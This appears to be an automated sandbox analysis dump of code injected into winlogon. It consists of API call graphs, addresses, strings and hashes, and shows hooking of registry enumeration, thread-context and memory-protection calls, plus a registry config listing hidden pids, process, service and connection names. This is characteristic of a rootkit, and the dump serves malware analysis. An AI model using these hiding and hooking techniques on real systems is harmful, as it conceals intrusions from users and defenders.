Is_bad_exception_allowed 9342->9343 9343->9341 9343->9342 9345 225dc64b63d 9344->9345 9357 225dc64b6cc 9344->9357 9346 225dc64a448 Is_bad_exception_allowed 9 API calls 9345->9346 9347 225dc64b646 9346->9347 9348 225dc64a448 Is_bad_exception_allowed 9 API calls 9347->9348 9349 225dc64b65f 9347->9349 9347->9357 9348->9349 9350 225dc64b68b 9349->9350 9351 225dc64a448 Is_bad_exception_allowed 9 API calls 9349->9351 9349->9357 9352 225dc64a45c 9 API calls 9350->9352 9351->9350 9353 225dc64b69f 9352->9353 9354 225dc64b6b8 9353->9354 9355 225dc64a448 Is_bad_exception_allowed 9 API calls 9353->9355 9353->9357 9356 225dc64a45c 9 API calls 9354->9356 9355->9354 9356->9357 9357->9259 9359 225dc64a0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9358->9359 9360 225dc64ae39 9359->9360 9361 225dc64a448 Is_bad_exception_allowed 9 API calls 9360->9361 9362 225dc64ae71 9361->9362 9363 225dc64a2b4 9 API calls 9362->9363 9364 225dc64aeb5 9363->9364 9364->9259 9366 225dc64a034 __FrameHandler3::ExecutionInCatch 9365->9366 9367 225dc649fbc __FrameHandler3::ExecutionInCatch 9 API calls 9366->9367 9368 225dc64a03e 9367->9368 9368->9274 9370 225dc647d30 _log10_special 8 API calls 9369->9370 9371 225dc64a3ae 9370->9371 9371->9298 9373 225dc64b3d9 9372->9373 9378 225dc64b5ec 9372->9378 9374 225dc648fe4 _CreateFrameInfo 9 API calls 9373->9374 9375 225dc64b3de 9374->9375 9376 225dc64b3fd EncodePointer 9375->9376 9382 225dc64b450 9375->9382 9377 225dc648fe4 _CreateFrameInfo 9 API calls 9376->9377 9379 225dc64b40d 9377->9379 9378->9298 9379->9382 9390 225dc649f68 9379->9390 9381 225dc64a448 9 API calls Is_bad_exception_allowed 9381->9382 9382->9378 9382->9381 9383 225dc64adfc 19 API calls 9382->9383 9383->9382 9385 225dc64a0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9384->9385 9386 225dc64aa6b 9385->9386 9386->9325 9386->9326 9388 225dc64a0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9387->9388 9389 225dc64aaaa 9388->9389 9389->9328 9391 225dc648fe4 _CreateFrameInfo 9 API calls 9390->9391 9392 225dc649f94 9391->9392 9392->9382 8423 225dc6503dc 8424 225dc6503e8 8423->8424 8426 225dc65040f 8424->8426 8427 225dc65260c 8424->8427 8428 225dc652611 8427->8428 8432 225dc65264c 8427->8432 8429 225dc652632 DeleteCriticalSection 8428->8429 8430 225dc652644 8428->8430 8429->8429 8429->8430 8431 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8430->8431 8431->8432 8432->8424 8987 225dc64cedc 8988 225dc64cef5 8987->8988 8989 225dc64cf0d 8987->8989 8988->8989 8990 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8988->8990 8990->8989 8991 225dc650cd8 8992 225dc650ce3 8991->8992 9000 225dc6535d8 8992->9000 9013 225dc64d2ec EnterCriticalSection 9000->9013 7581 225dc642964 NtEnumerateValueKey 7582 225dc642a0c 7581->7582 7585 225dc6429b0 7581->7585 7583 225dc6429be NtEnumerateValueKey 7583->7585 7585->7582 7585->7583 7586 225dc643c40 7585->7586 7587 225dc643c62 7586->7587 7588 225dc643c4d StrCmpNIW 7586->7588 7587->7585 7588->7587 9014 225dc6420e4 9015 225dc642115 9014->9015 9016 225dc64222b 9015->9016 9022 225dc642139 9015->9022 9023 225dc6421f6 9015->9023 9017 225dc642230 9016->9017 9019 225dc64229f 9016->9019 9031 225dc643198 GetProcessHeap HeapAlloc 9017->9031 9021 225dc643198 11 API calls 9019->9021 9019->9023 9020 225dc642171 StrCmpNIW 9020->9022 9021->9023 9022->9020 9022->9023 9025 225dc641c3c 9022->9025 9023->9023 9026 225dc641c63 GetProcessHeap HeapAlloc 9025->9026 9027 225dc641cc0 9025->9027 9026->9027 9028 225dc641c9e 9026->9028 9027->9022 9037 225dc641c08 9028->9037 9036 225dc6431eb 9031->9036 9032 225dc6432a9 GetProcessHeap HeapFree 9032->9023 9033 225dc6432a4 9033->9032 9034 225dc643236 StrCmpNIW 9034->9036 9035 225dc641c3c 6 API calls 9035->9036 9036->9032 9036->9033 9036->9034 9036->9035 9038 225dc641c28 GetProcessHeap HeapFree 9037->9038 9039 225dc641c1f 9037->9039 9038->9027 9040 225dc641534 2 API calls 9039->9040 9040->9038 9393 225dc656163 9396 225dc648d0c 9393->9396 9397 225dc648d36 9396->9397 9398 225dc648d24 9396->9398 9400 225dc648fe4 _CreateFrameInfo 9 API calls 9397->9400 9398->9397 9399 225dc648d2c 9398->9399 9401 225dc648d34 9399->9401 9403 225dc648fe4 _CreateFrameInfo 9 API calls 9399->9403 9402 225dc648d3b 9400->9402 9402->9401 9405 225dc648fe4 _CreateFrameInfo 9 API calls 9402->9405 9404 225dc648d5b 9403->9404 9406 225dc648fe4 _CreateFrameInfo 9 API calls 9404->9406 9405->9401 9407 225dc648d68 9406->9407 9408 225dc64cff8 23 API calls 9407->9408 9409 225dc648d71 9408->9409 9410 225dc64cff8 23 API calls 9409->9410 9411 225dc648d7d 9410->9411 9041 225dc6560dd 9042 225dc64a3f4 __CxxCallCatchBlock 9 API calls 9041->9042 9045 225dc6560f0 9042->9045 9043 225dc65612f __CxxCallCatchBlock 9044 225dc648fe4 _CreateFrameInfo 9 API calls 9043->9044 9046 225dc656143 9044->9046 9045->9043 9049 225dc648cb8 __CxxCallCatchBlock 9 API calls 9045->9049 9047 225dc648fe4 _CreateFrameInfo 9 API calls 9046->9047 9048 225dc656153 9047->9048 9049->9043 7701 225dc6460e0 7702 225dc6460ed 7701->7702 7703 225dc6460f9 7702->7703 7709 225dc64620a 7702->7709 7704 225dc64612e 7703->7704 7705 225dc64617d 7703->7705 7706 225dc646156 SetThreadContext 7704->7706 7706->7705 7707 225dc646231 VirtualProtect FlushInstructionCache 7707->7709 7708 225dc6462ee 7710 225dc64630e 7708->7710 7723 225dc6447d0 7708->7723 7709->7707 7709->7708 7719 225dc6451e0 GetCurrentProcess 7710->7719 7713 225dc646313 7714 225dc646367 7713->7714 7715 225dc646327 ResumeThread 7713->7715 7727 225dc647d30 7714->7727 7716 225dc64635b 7715->7716 7716->7713 7720 225dc6451fc 7719->7720 7721 225dc645212 VirtualProtect FlushInstructionCache 7720->7721 7722 225dc645243 7720->7722 7721->7720 7722->7713 7725 225dc6447ec 7723->7725 7724 225dc64484f 7724->7710 7725->7724 7726 225dc644802 VirtualFree 7725->7726 7726->7725 7728 225dc647d39 7727->7728 7729 225dc6463af 7728->7729 7730 225dc648508 IsProcessorFeaturePresent 7728->7730 7731 225dc648520 7730->7731 7736 225dc6486fc RtlCaptureContext 7731->7736 7737 225dc648716 RtlLookupFunctionEntry 7736->7737 7738 225dc64872c RtlVirtualUnwind 7737->7738 7739 225dc648533 7737->7739 7738->7737 7738->7739 7740 225dc6484d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7739->7740 7575 225dc643ea9 7576 225dc643df6 _invalid_parameter_noinfo 7575->7576 7577 225dc643e46 VirtualQuery 7576->7577 7578 225dc643e60 7576->7578 7579 225dc643e7a VirtualAlloc 7576->7579 7577->7576 7577->7578 7579->7578 7580 225dc643eab GetLastError 7579->7580 7580->7576 7580->7578 9050 225dc645ca9 9051 225dc645cb0 VirtualProtect 9050->9051 9052 225dc645cd9 GetLastError 9051->9052 9053 225dc645bc0 9051->9053 9052->9053 8734 225dc642a2c 8736 225dc642a80 8734->8736 8735 225dc642a9b 8736->8735 8738 225dc6433c4 8736->8738 8739 225dc6433e9 8738->8739 8740 225dc64345a 8738->8740 8739->8740 8741 225dc643c40 StrCmpNIW 8739->8741 8742 225dc641d14 StrCmpIW StrCmpW 8739->8742 8740->8735 8741->8739 8742->8739 9412 225dc648332 9413 225dc648d80 __std_exception_copy 49 API calls 9412->9413 9414 225dc64835d 9413->9414 9415 225dc655f31 __scrt_dllmain_exception_filter 8433 225dc64d5b4 8434 225dc64d5b9 8433->8434 8435 225dc64d5ce 8433->8435 8439 225dc64d5d4 8434->8439 8440 225dc64d616 8439->8440 8441 225dc64d61e 8439->8441 8443 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8440->8443 8442 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8441->8442 8444 225dc64d62b 8442->8444 8443->8441 8445 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8444->8445 8446 225dc64d638 8445->8446 8447 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8446->8447 8448 225dc64d645 8447->8448 8449 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8448->8449 8450 225dc64d652 8449->8450 8451 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8450->8451 8452 225dc64d65f 8451->8452 8453 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8452->8453 8454 225dc64d66c 8453->8454 8455 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8454->8455 8456 225dc64d679 8455->8456 8457 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8456->8457 8458 225dc64d689 8457->8458 8459 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8458->8459 8460 225dc64d699 8459->8460 8465 225dc64d484 8460->8465 8479 225dc64d2ec EnterCriticalSection 8465->8479 8743 225dc64ca34 8744 225dc64ca49 8743->8744 8745 225dc64ca4d 8743->8745 8746 225dc64f5e0 69 API calls 8745->8746 8747 225dc64ca52 8746->8747 8758 225dc64fb3c GetEnvironmentStringsW 8747->8758 8750 225dc64ca6b 8778 225dc64caa8 8750->8778 8751 225dc64ca5f 8753 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8751->8753 8753->8744 8755 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8756 225dc64ca92 8755->8756 8757 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8756->8757 8757->8744 8759 225dc64ca57 8758->8759 8760 225dc64fb6c 8758->8760 8759->8750 8759->8751 8761 225dc64fa5c WideCharToMultiByte 8760->8761 8762 225dc64fbbd 8761->8762 8763 225dc64fbc4 FreeEnvironmentStringsW 8762->8763 8764 225dc64d35c 12 API calls 8762->8764 8763->8759 8765 225dc64fbd7 8764->8765 8766 225dc64fbe8 8765->8766 8767 225dc64fbdf 8765->8767 8769 225dc64fa5c WideCharToMultiByte 8766->8769 8768 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8767->8768 8770 225dc64fbe6 8768->8770 8771 225dc64fc0b 8769->8771 8770->8763 8772 225dc64fc19 8771->8772 8773 225dc64fc0f 8771->8773 8774 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8772->8774 8775 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8773->8775 8776 225dc64fc17 FreeEnvironmentStringsW 8774->8776 8775->8776 8776->8759 8779 225dc64cacd 8778->8779 8780 225dc64e01c _invalid_parameter_noinfo 11 API calls 8779->8780 8792 225dc64cb03 8780->8792 8781 225dc64cb0b 8782 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8781->8782 8783 225dc64ca73 8782->8783 8783->8755 8784 225dc64cb7e 8785 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8784->8785 8785->8783 8786 225dc64e01c _invalid_parameter_noinfo 11 API calls 8786->8792 8787 225dc64cb6d 8788 225dc64cbb8 11 API calls 8787->8788 8790 225dc64cb75 8788->8790 8789 225dc64d038 __std_exception_copy 49 API calls 8789->8792 8791 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8790->8791 8791->8781 8792->8781 8792->8784 8792->8786 8792->8787 8792->8789 8793 225dc64cba3 8792->8793 8795 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8792->8795 8794 225dc64dee0 _invalid_parameter_noinfo 17 API calls 8793->8794 8796 225dc64cbb6 8794->8796 8795->8792 8481 225dc6553b0 8491 225dc648960 8481->8491 8483 225dc6553d8 8485 225dc648fe4 _CreateFrameInfo 9 API calls 8486 225dc6553e8 8485->8486 8487 225dc648fe4 _CreateFrameInfo 9 API calls 8486->8487 8488 225dc6553f1 8487->8488 8495 225dc64cff8 8488->8495 8493 225dc648990 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8491->8493 8492 225dc648a91 8492->8483 8492->8485 8493->8492 8494 225dc648a54 RtlUnwindEx 8493->8494 8494->8493 8496 225dc64d778 _invalid_parameter_noinfo 23 API calls 8495->8496 8497 225dc64d001 8496->8497 9416 225dc655330 9417 225dc655368 __GSHandlerCheckCommon 9416->9417 9418 225dc655394 9417->9418 9420 225dc64a4a0 9417->9420 9421 225dc648fe4 _CreateFrameInfo 9 API calls 9420->9421 9422 225dc64a4ca 9421->9422 9423 225dc648fe4 _CreateFrameInfo 9 API calls 9422->9423 9424 225dc64a4d7 9423->9424 9425 225dc648fe4 _CreateFrameInfo 9 API calls 9424->9425 9426 225dc64a4e0 9425->9426 9426->9418 9427 225dc65013c 9428 225dc650175 9427->9428 9430 225dc650146 9427->9430 9429 225dc65015b FreeLibrary 9429->9430 9430->9428 9430->9429 9431 225dc642b3c 9432 225dc642b99 9431->9432 9433 225dc642bb4 9432->9433 9434 225dc643478 3 API calls 9432->9434 9434->9433 8498 225dc650bb8 8499 225dc650be2 8498->8499 8500 225dc64e01c _invalid_parameter_noinfo 11 API calls 8499->8500 8501 225dc650c01 8500->8501 8502 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8501->8502 8503 225dc650c0f 8502->8503 8504 225dc64e01c _invalid_parameter_noinfo 11 API calls 8503->8504 8508 225dc650c39 8503->8508 8505 225dc650c2b 8504->8505 8507 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8505->8507 8507->8508 8509 225dc650c42 8508->8509 8510 225dc64ff5c 8508->8510 8511 225dc64fce4 5 API calls 8510->8511 8512 225dc64ff92 8511->8512 8513 225dc64ff97 8512->8513 8514 225dc64ffb1 InitializeCriticalSectionAndSpinCount 8512->8514 8513->8508 8514->8513 9063 225dc6560b8 9066 225dc64bbd8 9063->9066 9067 225dc64bc3f 9066->9067 9068 225dc64bbf2 9066->9068 9068->9067 9069 225dc648fe4 _CreateFrameInfo 9 API calls 9068->9069 9069->9067 9070 225dc64c4c1 9071 225dc64cff8 23 API calls 9070->9071 9072 225dc64c4c6 9071->9072 9073 225dc64c537 9072->9073 9074 225dc64c4ed GetModuleHandleW 9072->9074 9087 225dc64c3c4 9073->9087 9074->9073 9080 225dc64c4fa 9074->9080 9080->9073 9082 225dc64c5e8 GetModuleHandleExW 9080->9082 9083 225dc64c61c GetProcAddress 9082->9083 9086 225dc64c62e 9082->9086 9083->9086 9084 225dc64c64a FreeLibrary 9085 225dc64c651 9084->9085 9085->9073 9086->9084 9086->9085 9101 225dc64d2ec EnterCriticalSection 9087->9101 7589 225dc64593d 7591 225dc645944 7589->7591 7590 225dc6459ab 7591->7590 7592 225dc645a27 VirtualProtect 7591->7592 7593 225dc645a61 7592->7593 7594 225dc645a53 GetLastError 7592->7594 7594->7593 9435 225dc650540 9438 225dc6504f8 9435->9438 9443 225dc64d2ec EnterCriticalSection 9438->9443 8515 225dc6423c0 8517 225dc64243e _invalid_parameter_noinfo 8515->8517 8516 225dc64255b 8517->8516 8518 225dc6424a3 GetFileType 8517->8518 8519 225dc6424c5 8518->8519 8520 225dc6424b1 StrCpyW 8518->8520 8521 225dc6419e0 4 API calls 8519->8521 8524 225dc6424d2 8520->8524 8521->8524 8522 225dc643c40 StrCmpNIW 8522->8524 8523 225dc6432d8 4 API calls 8523->8524 8524->8516 8524->8522 8524->8523 8525 225dc641ce0 2 API calls 8524->8525 8525->8524 9444 225dc647f0c 9446 225dc647f30 __scrt_acquire_startup_lock 9444->9446 9445 225dc64c235 9446->9445 9447 225dc64d8f0 __std_exception_copy 11 API calls 9446->9447 9448 225dc64c25e 9447->9448 9112 225dc646093 9113 225dc6460a0 9112->9113 9114 225dc6460ac GetThreadContext 9113->9114 9119 225dc64620a 9113->9119 9115 225dc6460d2 9114->9115 9114->9119 9115->9119 9121 225dc6460f9 9115->9121 9116 225dc646231 VirtualProtect FlushInstructionCache 9116->9119 9117 225dc6462ee 9118 225dc64630e 9117->9118 9123 225dc6447d0 VirtualFree 9117->9123 9120 225dc6451e0 3 API calls 9118->9120 9119->9116 9119->9117 9127 225dc646313 9120->9127 9122 225dc64617d 9121->9122 9124 225dc646156 SetThreadContext 9121->9124 9123->9118 9124->9122 9125 225dc646367 9128 225dc647d30 _log10_special 8 API calls 9125->9128 9126 225dc646327 ResumeThread 9126->9127 9127->9125 9127->9126 9129 225dc6463af 9128->9129 8526 225dc650590 8527 225dc6505c0 8526->8527 8529 225dc6505e7 8526->8529 8528 225dc64d8f0 __std_exception_copy 11 API calls 8527->8528 8527->8529 8534 225dc6505d4 8527->8534 8528->8534 8530 225dc6506bc 8529->8530 8549 225dc64d2ec EnterCriticalSection 8529->8549 8533 225dc6507f0 8530->8533 8535 225dc650723 8530->8535 8542 225dc6506ea 8530->8542 8531 225dc650624 8536 225dc6507fd 8533->8536 8551 225dc64d340 LeaveCriticalSection 8533->8551 8534->8529 8534->8531 8537 225dc650669 8534->8537 8547 225dc650781 8535->8547 8550 225dc64d340 LeaveCriticalSection 8535->8550 8540 225dc64dffc __std_exception_copy 11 API calls 8537->8540 8541 225dc65066e 8540->8541 8543 225dc64dec0 _invalid_parameter_noinfo 49 API calls 8541->8543 8542->8535 8544 225dc64d778 _invalid_parameter_noinfo 23 API calls 8542->8544 8543->8531 8545 225dc650713 8544->8545 8546 225dc64d778 _invalid_parameter_noinfo 23 API calls 8545->8546 8546->8535 8548 225dc64d778 23 API calls _invalid_parameter_noinfo 8547->8548 8548->8547 8552 225dc651990 8554 225dc6519af 8552->8554 8553 225dc651a28 8560 225dc6485dc 8553->8560 8554->8553 8557 225dc6519bf 8554->8557 8558 225dc647d30 _log10_special 8 API calls 8557->8558 8559 225dc651a1e 8558->8559 8563 225dc6485f0 IsProcessorFeaturePresent 8560->8563 8564 225dc648607 8563->8564 8569 225dc64868c RtlCaptureContext RtlLookupFunctionEntry 8564->8569 8570 225dc6486bc RtlVirtualUnwind 8569->8570 8571 225dc64861b 8569->8571 8570->8571 8572 225dc6484d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8571->8572 9130 225dc651490 9131 225dc6514bd 9130->9131 9132 225dc64dffc __std_exception_copy 11 API calls 9131->9132 9137 225dc6514d2 9131->9137 9133 225dc6514c7 9132->9133 9134 225dc64dec0 _invalid_parameter_noinfo 49 API calls 9133->9134 9134->9137 9135 225dc647d30 _log10_special 8 API calls 9136 225dc651890 9135->9136 9137->9135 9138 225dc643090 9139 225dc6430c0 9138->9139 9140 225dc643179 9139->9140 9141 225dc6430dd PdhGetCounterInfoW 9139->9141 9141->9140 9142 225dc6430fb GetProcessHeap HeapAlloc PdhGetCounterInfoW 9141->9142 9143 225dc643165 GetProcessHeap HeapFree 9142->9143 9144 225dc64312d StrCmpW 9142->9144 9143->9140 9144->9143 9145 225dc643142 9144->9145 9145->9143 9147 225dc643520 StrCmpNW 9145->9147 9148 225dc6435c2 9147->9148 9149 225dc643552 StrStrW 9147->9149 9148->9145 9149->9148 9150 225dc64356b StrToIntW 9149->9150 9150->9148 9151 225dc643593 9150->9151 9151->9148 9157 225dc64193c OpenProcess 9151->9157 9154 225dc643c40 StrCmpNIW 9155 225dc6435b4 9154->9155 9155->9148 9156 225dc641c08 2 API calls 9155->9156 9156->9148 9158 225dc6419c2 9157->9158 9159 225dc641970 K32GetModuleFileNameExW 9157->9159 9158->9148 9158->9154 9160 225dc6419b9 CloseHandle 9159->9160 9161 225dc64198a PathFindFileNameW lstrlenW 9159->9161 9160->9158 9161->9160 9162 225dc6419a8 StrCpyW 9161->9162 9162->9160 9449 225dc64cf1c 9450 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9449->9450 9451 225dc64cf2c 9450->9451 9452 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9451->9452 9453 225dc64cf40 9452->9453 9454 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9453->9454 9455 225dc64cf54 9454->9455 9456 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9455->9456 9457 225dc64cf68 9456->9457 8808 225dc647c1c 8809 225dc647c38 8808->8809 8810 225dc647c3d 8808->8810 8812 225dc647d50 8809->8812 8813 225dc647de7 8812->8813 8814 225dc647d73 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8812->8814 8813->8810 8814->8813 8815 225dc656015 8816 225dc648fe4 _CreateFrameInfo 9 API calls 8815->8816 8817 225dc65602d 8816->8817 8818 225dc648fe4 _CreateFrameInfo 9 API calls 8817->8818 8819 225dc656048 8818->8819 8820 225dc648fe4 _CreateFrameInfo 9 API calls 8819->8820 8821 225dc65605c 8820->8821 8822 225dc648fe4 _CreateFrameInfo 9 API calls 8821->8822 8823 225dc65609e 8822->8823 9163 225dc642898 9165 225dc6428de 9163->9165 9164 225dc642944 9165->9164 9166 225dc643c40 StrCmpNIW 9165->9166 9166->9165 8579 225dc64f9a4 GetCommandLineA GetCommandLineW 9167 225dc64d2a4 9168 225dc64d2ac 9167->9168 9169 225dc64ff5c 6 API calls 9168->9169 9170 225dc64d2dd 9168->9170 9171 225dc64d2d9 9168->9171 9169->9168 9173 225dc64d308 9170->9173 9174 225dc64d333 9173->9174 9175 225dc64d316 DeleteCriticalSection 9174->9175 9176 225dc64d337 9174->9176 9175->9174 9176->9171 8824 225dc645624 8825 225dc64562a 8824->8825 8836 225dc647c5c 8825->8836 8830 225dc645727 _invalid_parameter_noinfo 8832 225dc6458ad 8830->8832 8834 225dc64568e 8830->8834 8849 225dc647830 8830->8849 8831 225dc6459ab 8832->8831 8833 225dc645a27 VirtualProtect 8832->8833 8833->8834 8835 225dc645a53 GetLastError 8833->8835 8835->8834 8837 225dc647c67 8836->8837 8838 225dc64566d 8837->8838 8839 225dc64c1ac _invalid_parameter_noinfo 2 API calls 8837->8839 8840 225dc647c86 8837->8840 8838->8834 8845 225dc6440b0 8838->8845 8839->8837 8841 225dc647c91 8840->8841 8855 225dc648478 8840->8855 8859 225dc648498 8841->8859 8846 225dc6440cd 8845->8846 8848 225dc64413c _invalid_parameter_noinfo 8846->8848 8868 225dc644320 8846->8868 8848->8830 8850 225dc647877 8849->8850 8893 225dc647600 8850->8893 8853 225dc647d30 _log10_special 8 API calls 8854 225dc6478a1 8853->8854 8854->8830 8856 225dc648486 std::bad_alloc::bad_alloc 8855->8856 8863 225dc648e38 8856->8863 8858 225dc648497 8860 225dc6484a6 std::bad_alloc::bad_alloc 8859->8860 8861 225dc648e38 Concurrency::cancel_current_task 2 API calls 8860->8861 8862 225dc647c97 8861->8862 8864 225dc648e57 8863->8864 8865 225dc648ea2 RaiseException 8864->8865 8866 225dc648e80 RtlPcToFileHeader 8864->8866 8865->8858 8867 225dc648e98 8866->8867 8867->8865 8869 225dc644344 8868->8869 8870 225dc644367 8868->8870 8869->8870 8882 225dc643dd0 8869->8882 8873 225dc64439d 8870->8873 8888 225dc643f00 8870->8888 8874 225dc6443cd 8873->8874 8876 225dc643f00 2 API calls 8873->8876 8875 225dc644403 8874->8875 8879 225dc643dd0 3 API calls 8874->8879 8877 225dc64441f 8875->8877 8880 225dc643dd0 3 API calls 8875->8880 8876->8874 8878 225dc64443b 8877->8878 8881 225dc643f00 2 API calls 8877->8881 8878->8848 8879->8875 8880->8877 8881->8878 8887 225dc643df1 _invalid_parameter_noinfo 8882->8887 8883 225dc643e60 8883->8870 8884 225dc643e46 VirtualQuery 8884->8883 8884->8887 8885 225dc643e7a VirtualAlloc 8885->8883 8886 225dc643eab GetLastError 8885->8886 8886->8883 8886->8887 8887->8883 8887->8884 8887->8885 8891 225dc643f18 _invalid_parameter_noinfo 8888->8891 8889 225dc643f6d VirtualQuery 8890 225dc643f87 8889->8890 8889->8891 8890->8873 8891->8889 8891->8890 8892 225dc643fd2 GetLastError 8891->8892 8892->8890 8892->8891 8894 225dc64761b 8893->8894 8895 225dc647631 SetLastError 8894->8895 8896 225dc64763f 8894->8896 8895->8896 8896->8853 8580 225dc6503a0 8591 225dc64d2ec EnterCriticalSection 8580->8591

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 263 225dc642964-225dc6429ae NtEnumerateValueKey 264 225dc642a0c-225dc642a2a 263->264 265 225dc6429b0-225dc6429b3 263->265 265->264 266 225dc6429b5-225dc6429b7 265->266 267 225dc6429ba-225dc6429bc 266->267 267->264 268 225dc6429be-225dc6429dd NtEnumerateValueKey 267->268 269 225dc6429ee 268->269 270 225dc6429df-225dc6429e2 268->270 273 225dc6429f2-225dc642a0a call 225dc643c40 269->273 271 225dc6429e8-225dc6429ec 270->271 272 225dc6429e4-225dc6429e6 270->272 271->273 272->273 273->264 273->267
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: EnumerateValue
                                                  • String ID:
                                                  • API String ID: 1749906896-0
                                                  • Opcode ID: 9a3d6abee053d119b5b0bb566e5bc8119ec09140ace283cc72c3a18935112346
                                                  • Instruction ID: 0b50e47f91de2f3a841e999b4756b6ed4b4a4d4918fe915f80a849185858d9f9
                                                  • Opcode Fuzzy Hash: 9a3d6abee053d119b5b0bb566e5bc8119ec09140ace283cc72c3a18935112346
                                                  • Instruction Fuzzy Hash: BF21A23A70CB60A6E3758F9AA84462EB7A4F785F95F618169DE9643750DF34C482C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\x4config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-1036178600
                                                  • Opcode ID: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction ID: 4060dcf234067205f66210aef9d36187579d7e1192983bcceedd1407f90524a3
                                                  • Opcode Fuzzy Hash: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction Fuzzy Hash: FF712E7A728E20A6EB10DFB9E89869D33B4F784B9AF509111DE4E47B68DF38C444C740

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction ID: d736b1b5467b62432eb4083e2eb21928da4db5b5dadb3ae7b98bcab4dc7880da
